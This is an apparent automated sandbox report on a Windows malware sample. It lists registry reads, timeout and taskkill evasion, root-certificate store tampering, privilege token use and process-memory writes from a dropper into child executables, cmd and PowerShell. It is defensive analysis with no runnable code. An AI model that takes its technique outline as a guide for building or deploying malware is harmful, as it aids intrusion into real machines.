Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1728 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
